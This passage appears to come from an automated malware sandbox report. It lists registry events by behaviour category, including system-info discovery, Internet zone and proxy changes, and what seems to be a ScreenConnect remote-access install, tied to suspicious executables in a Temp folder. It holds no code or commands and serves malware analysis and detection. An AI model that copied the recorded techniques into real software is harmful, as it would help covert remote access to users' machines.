| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 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 | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\pothjasefdj.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\pothjasefdj.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\28 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\29 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2d | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133839716223694434" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2F\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\30 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2B | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\32 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\32\52C64B7E | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2C | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\30 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\29 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\InstallerPinned = "0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2c | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2f | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\32\52C64B7E\@%systemroot%\system32\FirewallControlPanel.dll,-12122 = "Windows Defender Firewall" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2E | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2D | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2f | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\31 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\31 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2e | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\AppID\{1FCBE96C-1697-43AF-9140-2897C7C69767} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C9C2B807-7731-4F34-81B7-44FF7779522B}\TypeLib\Version = "1.0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\594E83E3B144E17B918A56C8188C0B21\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-e9736d81e38965d1 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-0D32-6986436855F3}\InprocServer32 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}\LocalServer32\ServerExecutable = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\notification_helper.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\Implemented Categories\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/pdf\Extension = ".pdf" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\ = "Microsoft Edge HTML Document" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\594E83E3B144E17B918A56C8188C0B21\ProductIcon = "C:\\Windows\\Installer\\{3E38E495-441B-B71E-19A8-658C81C8B012}\\DefaultIcon" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\594E83E3B144E17B918A56C8188C0B21\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-0D32-6986436855F3} | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\TypeLib\{C9C2B807-7731-4F34-81B7-44FF7779522B}\1.0\0\win32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO\CLSID\ = "{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
